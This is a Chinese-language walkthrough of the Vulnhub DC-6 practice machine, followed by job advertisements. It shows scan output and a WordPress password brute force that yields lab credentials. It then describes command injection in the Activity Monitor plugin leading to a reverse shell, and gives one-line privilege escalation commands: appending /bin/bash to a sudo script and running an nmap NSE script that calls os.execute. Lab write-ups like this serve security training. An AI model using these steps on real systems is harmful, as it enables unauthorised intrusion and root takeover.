Vulnhub 靶机实战系列:DC -6
2022-10-11 00:1:58 Author: 白帽子(查看原文) 阅读量:14 收藏

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

No.1

搭建测试靶机

下载地址:https://www.five86.com/dc-6.html
则靶机DC-6 ip:192.168.188.161(NAT连接)
攻击机kalilinux ip:192.168.188.144

No.2

信息收集

用netdiscover -r 192.168.188.0/24 扫描ip,得到靶机ip 192.168.188.161

先来端口扫描
利用nmap对目标主机进行端口扫描,发现开放端口:80

使用命令:nmap -sV -A 192.168.188.161 -oN dc.nmap
[email protected]:~# nmap -sV -A 192.168.188.161 -oN dc.nmapStarting Nmap 7.80 ( https://nmap.org ) at 2020-12-03 09:43 CSTNmap scan report for 192.168.188.161Host is up (0.00038s latency).Not shown: 998 closed portsPORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)| ssh-hostkey: |   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)80/tcp open  http    Apache httpd 2.4.25 ((Debian))|_http-server-header: Apache/2.4.25 (Debian)|_http-title: Did not follow redirect to http://wordy/|_https-redirect: ERROR: Script execution failed (use -d to debug)MAC Address: 00:0C:29:DF:CA:2A (VMware)Device type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTEHOP RTT ADDRESS1 0.38 ms 192.168.188.161
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.35 seconds

目录扫描
通过dirb命令扫描网站子目录

命令:dirb http://wordy/
root@kalilinux:~# dirb http://wordy/
-----------------DIRB v2.22 By The Dark Raver-----------------
START_TIME: Thu Dec 3 13:54:01 2020URL_BASE: http://wordy/WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://wordy/ ----+ http://wordy/index.php (CODE:301|SIZE:0) + http://wordy/server-status (CODE:403|SIZE:293) ==> DIRECTORY: http://wordy/wp-admin/ ==> DIRECTORY: http://wordy/wp-content/ ==> DIRECTORY: http://wordy/wp-includes/ + http://wordy/xmlrpc.php (CODE:405|SIZE:42) ---- Entering directory: http://wordy/wp-admin/ ----+ http://wordy/wp-admin/admin.php (CODE:302|SIZE:0) ==> DIRECTORY: http://wordy/wp-admin/css/ ==> DIRECTORY: http://wordy/wp-admin/images/ ==> DIRECTORY: http://wordy/wp-admin/includes/ + http://wordy/wp-admin/index.php (CODE:302|SIZE:0) ==> DIRECTORY: http://wordy/wp-admin/js/ ==> DIRECTORY: http://wordy/wp-admin/maint/ ==> DIRECTORY: http://wordy/wp-admin/network/ ==> DIRECTORY: http://wordy/wp-admin/user/ ---- Entering directory: http://wordy/wp-content/ ----+ http://wordy/wp-content/index.php (CODE:200|SIZE:0) ==> DIRECTORY: http://wordy/wp-content/plugins/ ==> DIRECTORY: http://wordy/wp-content/themes/ ---- Entering directory: http://wordy/wp-includes/ ----(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://wordy/wp-admin/css/ ----(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://wordy/wp-admin/images/ ----(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://wordy/wp-admin/includes/ ----(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://wordy/wp-admin/js/ ----(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://wordy/wp-admin/maint/ ----(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://wordy/wp-admin/network/ ----+ http://wordy/wp-admin/network/admin.php (CODE:302|SIZE:0) + http://wordy/wp-admin/network/index.php (CODE:302|SIZE:0) ---- Entering directory: http://wordy/wp-admin/user/ ----+ http://wordy/wp-admin/user/admin.php (CODE:302|SIZE:0) + http://wordy/wp-admin/user/index.php (CODE:302|SIZE:0) ---- Entering directory: http://wordy/wp-content/plugins/ ----+ http://wordy/wp-content/plugins/index.php (CODE:200|SIZE:0) ---- Entering directory: http://wordy/wp-content/themes/ ----+ http://wordy/wp-content/themes/index.php (CODE:200|SIZE:0) -----------------END_TIME: Thu Dec 3 13:54:40 2020DOWNLOADED: 32284 - FOUND: 12root@kalilinux:~#

No.3

漏洞利用

可知开放22、80端口,我们访问一下80端口看看,访问不成功。

查看页面发现需要配置域名解析,将目标ip地址(192.168.188.161 wordy)添加进hosts中。kali中是 /etc/hosts

成功访问

是wordpress的cms
使用wpscan收集一下用户名信息

命令:wpscan --url http://wordy/ -e u  

得到以下用户名
Admin, graham,mark,sarah,jens
保存用户名

DC-6的作者在这里也给出了密码的提示https://www.vulnhub.com/entry/dc-6,315/

我们根据提示生成一本字典,用于密码爆破

暴力破解获得用户名密码

命令:wpscan --url wordy -U users.txt -P dc6password.txt

Mark : helpdesk01
用户名密码有了,然后登录wordpress后台
通过前面目录扫描得到管理后台的网址为:http://wordy/wp-admin/index.php

发现使用了activity monitor插件

查找activity monitor插件相关漏洞

查看45274.htmll内容

根据作者的描述,先用作者提供的代码尝试反弹shell

我们直接利用/usr/share/exploitdb/exploits/php/webapps/目录下的45274.html文件
将该45274.html文件拷贝到/root目录下

命令:cp /usr/share/exploitdb/exploits/php/webapps/45274.html dc6.html

直接复制该HTML,并对其进行修改;

完成修改后,我们打开dc6.html文件,发现不能够成功反弹出shell,这条路不通,只能尝试别的了;

通过BurpSuite进行抓包,能否成功反弹shell
点击tools,输入框中中如数任意字符,最后点击lookup按钮后,进行抓包

用BurpSuite进行抓包

将该流量导入到Repeater中,将“123456”改掉,用浏览器去访问它,我这里使用的是baidu.com,我们访问whoami,查看他的权限

结果返回了www-data,说明确实存在漏洞
我们就尝试使用nc命令进行反弹
(1)第一步:使用kali进行监听;

(2)第二步:修改抓包的源码,点击GO按钮

(3)第三步:反弹shell成功,成功拿下shell;

(4)第四步:通过python命令进入交互式模式,以便下面额操作;

命令:python -cimport pty;pty.spawn("/bin/bash")’

进入交互式模式,我们进行下一步操作

拿到账号密码

graham : GSo7isUM1D4

我们使用拿到的账号密码登陆ssh

下面提权
在jens的用户目录下发现shell脚本,并且此脚本有执行权限

此脚本在当前用户下有读写权限,修改脚本内容,在末尾增加/bin/bash,当执行时可以获得jens的shell

echo '/bin/bash'  >> backups.shsudo -u jens ./backups.sh

成功切换到jens用户

查看jens可以使用的root权限命令,发现nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权

写入如下命令成功拿到flag:

echo 'os.execute("/bin/sh")' >get_root.nsesudo nmap --script=/home/jens/get_root.nse

招聘启事

安恒雷神众测SRC运营(实习生)
————————
【职责描述】
1.  负责SRC的微博、微信公众号等线上新媒体的运营工作,保持用户活跃度,提高站点访问量;
2.  负责白帽子提交漏洞的漏洞审核、Rank评级、漏洞修复处理等相关沟通工作,促进审核人员与白帽子之间友好协作沟通;
3.  参与策划、组织和落实针对白帽子的线下活动,如沙龙、发布会、技术交流论坛等;
4.  积极参与雷神众测的品牌推广工作,协助技术人员输出优质的技术文章;
5.  积极参与公司媒体、行业内相关媒体及其他市场资源的工作沟通工作。

【任职要求】 
 1.  责任心强,性格活泼,具备良好的人际交往能力;
 2.  对网络安全感兴趣,对行业有基本了解;
 3.  良好的文案写作能力和活动组织协调能力。

简历投递至 

[email protected]

设计师(实习生)

————————

【职位描述】
负责设计公司日常宣传图片、软文等与设计相关工作,负责产品品牌设计。

【职位要求】
1、从事平面设计相关工作1年以上,熟悉印刷工艺;具有敏锐的观察力及审美能力,及优异的创意设计能力;有 VI 设计、广告设计、画册设计等专长;
2、有良好的美术功底,审美能力和创意,色彩感强;精通photoshop/illustrator/coreldrew/等设计制作软件;
3、有品牌传播、产品设计或新媒体视觉工作经历;

【关于岗位的其他信息】
企业名称:杭州安恒信息技术股份有限公司
办公地点:杭州市滨江区安恒大厦19楼
学历要求:本科及以上
工作年限:1年及以上,条件优秀者可放宽

简历投递至

[email protected]

安全招聘
————————

公司:安恒信息
岗位:Web安全 安全研究员
部门:战略支援部
薪资:13-30K
工作年限:1年+
工作地点:杭州(总部)、广州、成都、上海、北京

工作环境:一座大厦,健身场所,医师,帅哥,美女,高级食堂…

【岗位职责】
1.定期面向部门、全公司技术分享;
2.前沿攻防技术研究、跟踪国内外安全领域的安全动态、漏洞披露并落地沉淀;
3.负责完成部门渗透测试、红蓝对抗业务;
4.负责自动化平台建设
5.负责针对常见WAF产品规则进行测试并落地bypass方案

【岗位要求】
1.至少1年安全领域工作经验;
2.熟悉HTTP协议相关技术
3.拥有大型产品、CMS、厂商漏洞挖掘案例;
4.熟练掌握php、java、asp.net代码审计基础(一种或多种)
5.精通Web Fuzz模糊测试漏洞挖掘技术
6.精通OWASP TOP 10安全漏洞原理并熟悉漏洞利用方法
7.有过独立分析漏洞的经验,熟悉各种Web调试技巧
8.熟悉常见编程语言中的至少一种(Asp.net、Python、php、java)

【加分项】
1.具备良好的英语文档阅读能力;
2.曾参加过技术沙龙担任嘉宾进行技术分享;
3.具有CISSP、CISA、CSSLP、ISO27001、ITIL、PMP、COBIT、Security+、CISP、OSCP等安全相关资质者;
4.具有大型SRC漏洞提交经验、获得年度表彰、大型CTF夺得名次者;
5.开发过安全相关的开源项目;
6.具备良好的人际沟通、协调能力、分析和解决问题的能力者优先;
7.个人技术博客;
8.在优质社区投稿过文章;

岗位:安全红队武器自动化工程师
薪资:13-30K
工作年限:2年+
工作地点:杭州(总部)

【岗位职责】
1.负责红蓝对抗中的武器化落地与研究;
2.平台化建设;
3.安全研究落地。

【岗位要求】
1.熟练使用Python、java、c/c++等至少一门语言作为主要开发语言;
2.熟练使用Django、flask 等常用web开发框架、以及熟练使用mysql、mongoDB、redis等数据存储方案;
3:熟悉域安全以及内网横向渗透、常见web等漏洞原理;
4.对安全技术有浓厚的兴趣及热情,有主观研究和学习的动力;
5.具备正向价值观、良好的团队协作能力和较强的问题解决能力,善于沟通、乐于分享。

【加分项】
1.有高并发tcp服务、分布式等相关经验者优先;
2.在github上有开源安全产品优先;
3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先;
4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先;
5.具备良好的英语文档阅读能力。

简历投递至 

[email protected]

岗位:红队武器化Golang开发工程师
薪资:13-30K
工作年限:2年+
工作地点:杭州(总部)

【岗位职责】
1.负责红蓝对抗中的武器化落地与研究;
2.平台化建设;
3.安全研究落地。

【岗位要求】
1.掌握C/C++/Java/Go/Python/JavaScript等至少一门语言作为主要开发语言;
2.熟练使用Gin、Beego、Echo等常用web开发框架、熟悉MySQL、Redis、MongoDB等主流数据库结构的设计,有独立部署调优经验;
3.了解docker,能进行简单的项目部署;
3.熟悉常见web漏洞原理,并能写出对应的利用工具;
4.熟悉TCP/IP协议的基本运作原理;
5.对安全技术与开发技术有浓厚的兴趣及热情,有主观研究和学习的动力,具备正向价值观、良好的团队协作能力和较强的问题解决能力,善于沟通、乐于分享。

【加分项】
1.有高并发tcp服务、分布式、消息队列等相关经验者优先;
2.在github上有开源安全产品优先;
3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先;
4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先;
5.具备良好的英语文档阅读能力。

简历投递至

[email protected]

专注渗透测试技术

全球最新网络攻击技术

END


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246385&idx=1&sn=a3fed1b783e9ad376f9dff38ee7c167b&chksm=82ea5758b59dde4e05cd85a50774142fa8ed60ea1df198a1e02094d0bf4923e092900a3b1fcb#rd
如有侵权请联系:admin#unsafe.sh